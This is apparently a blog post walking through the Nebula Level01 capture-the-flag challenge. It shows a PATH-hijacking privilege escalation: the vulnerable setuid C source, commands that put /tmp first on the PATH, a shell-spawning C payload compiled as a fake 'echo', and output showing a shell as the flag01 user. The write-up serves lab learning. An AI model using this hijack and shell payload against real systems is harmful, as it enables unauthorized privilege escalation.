2 minute read

The next level, Level01, provides some C code for the user to evaluate. The code contains a vulnerability that allows arbitrary programs to be executed. This post will outline the steps I took to solve the challenge.

I started by reading through the source code in order to locate the vulnerability:

	#include <stdlib.h>
	#include <unistd.h>
	#include <string.h>
	#include <sys/types.h>
	#include <stdio.h>

	int main(int argc, char **argv, char **envp)
  	gid_t gid;
  	uid_t uid;
  	gid = getegid();
  	uid = geteuid();

  	setresgid(gid, gid, gid);
  	setresuid(uid, uid, uid);

  	system("/usr/bin/env echo and now what?");

Almost immediately, I noticed that “echo” is being called without the absolute path. This is a major security vulnerability because the script will rely on the environment variables of the current shell (which can be tampered with).

Let’s modify our path to include /tmp/:

	level01@nebula:/home/flag01$ PATH=/tmp:$PATH
	level01@nebula:/home/flag01$ export PATH
	level01@nebula:/home/flag01$ echo $PATH

Now that /tmp is in the current path, we can create our own “echo” command. I have included C code below to spawn a shell. I used this code extensively in my OSCP studies as my payload when exploiting Linux/Unix boxes.

	#include <unistd.h>

	int main() {
        	char *args[2];
        	args[0] = "/bin/sh";
        	args[1] = NULL;
        	execve(args[0], args, NULL);

A nice write-up on the code can be found here if you are curious about the creation and execution.

After creating the new “echo” program, I need to compile the code.

	level01@nebula:/tmp$ gcc echo.c -o echo
	level01@nebula:/tmp$ ls
	echo echo.c vmware-root

Now I can call the original script, which will now run our “echo” program:

	level01@nebula:/home/flag01$ id
	uid=1002(level01) gid=1002(level01) groups=1002(level01)
	level01@nebula:/home/flag01$ ./flag01
	sh-4.2$ id
	uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
	sh-4.2$ getflag
	You have successfully executed getflag on a target account



comments powered by Disqus